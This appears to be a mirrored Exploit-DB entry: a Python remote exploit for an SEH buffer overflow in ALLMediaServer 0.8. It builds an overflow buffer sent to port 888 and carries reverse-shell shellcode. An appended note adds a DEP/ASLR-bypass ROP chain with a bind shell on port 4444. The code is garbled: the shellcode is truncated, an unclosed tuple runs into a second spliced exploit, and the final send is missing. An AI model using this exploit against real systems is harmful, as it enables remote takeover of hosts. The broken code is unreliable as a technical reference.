ALLMediaServer 0.8 – Remote Overflow (SEH)

  • 作者: motaz reda
    日期: 2012-07-06
  • 类别:
  • 来源:
  • # Exploit Title: seh exploit, BOF 
    # Date: 04/07/2012
    # Exploit Author: motaz reda 
    # my
    # Software Link:
    # Version: ALLMediaServer 0.8
    # Tested On: Windows 7 ultimate
    import sys, socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 888))
    buffer = "A" * 1072
    buffer += "\xeb\x06\x90\x90" #NSEHjmp short 6
    buffer += "\xca\x24\xec\x65" # SEHPOP POP RETN
    # msfpayload windows/shell_reverse_tcp 
    # you can replace the shellcode with any shellcode u want
    buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1"
    ### Exploit-DB note:
    ### This affects AllMediaSErver 0.94 as well.
    # Exploit-DB Note:
    # Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn
    # DEP/ASLR bypass with bind shell on port 4444
    buffer = "\x41" * 984
    buffer+= "\xe6\x30\x46\x00"	# Second ADD esp for stack adjustment
    				# add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe
    buffer+= "\x41" * 88
    # Step over SEH
    stackAdjust = "\x9e\x6c\x42\x00"	# add esp,800 | pop ebx | retn ~ MediaServer.exe
    					# Returns to Second ADD ESP
    stackAdjust+= "\x42\x42\x42\x42" * 15	# Padding
    # VirtualProtect into ESI
    rop = "\x26\xfa\xf6\x65"	# pop eax | retn	 		~ avcodec-53.dll
    rop+= "\xe0\xe4\x1e\x67"	# &kernel32.VirtualProtect		~
    rop+= "\x54\xcd\xc6\x6a"	# mov eax,dword ptr ds:[eax] | retn	~
    rop+= "\x04\xef\x2e\x66"	# xchg eax,esi | retn			~ avcodec-53.dll
    				# Puts Kernel31.VirtualProtect
    # lpAddress param into EBP
    rop+= "\xb3\x14\xb8\x68"# pop ebp | retn 	~
    rop+= "\x07\x5d\x0c\x66"	# ROP jmp esp | ???			~ avcodec-53.dll
    # dwSize into EBX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn~ avcodec-53.dll
    rop+= "\xff\xfd\xff\xff"	# Will negate to 0x201
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn
    rop+= "\x2b\xe2\xf4\x65"	# xchg eax,ebx | retn			~ avcodec-53.dll
    # flNewProtect 0x40 into EDX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\xc0\xff\xff\xff"	# Will negate to 0x40
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn~ avcodec-53.dll
    rop+= "\x46\x08\x53\x66"	# xchg eax,edx | retn			~ avcoded-53.dll
    # lpflOldProtect into ECX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x69\xef\x5f\x00"	# writeable address			~ avformat-53.dll
    rop+= "\xeb\x9b\x74\x66"	# xchg eax,ecx | retn			~ avcodec-53.dll
    # RETN into EDI
    rop+= "\x84\xe6\x75\x66"	# pop edi | retn
    rop+= "\x6d\x9b\xb2\x6a"	# retn ROP
    # Nops in EAX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x90\x90\x90\x90"
    # PushAD
    rop+= "\x3a\x18\x75\x66"	# pushad | rent				~ avodec-53.dll
    rop+= "\x90\x90\x90\x90"
    shellcode =(
    payload = buffer + stackAdjust + rop + shellcode
    rest = 1765 - len(payload)
    exploit = payload + "\xCC" * rest
    # Send exploit to target's port 888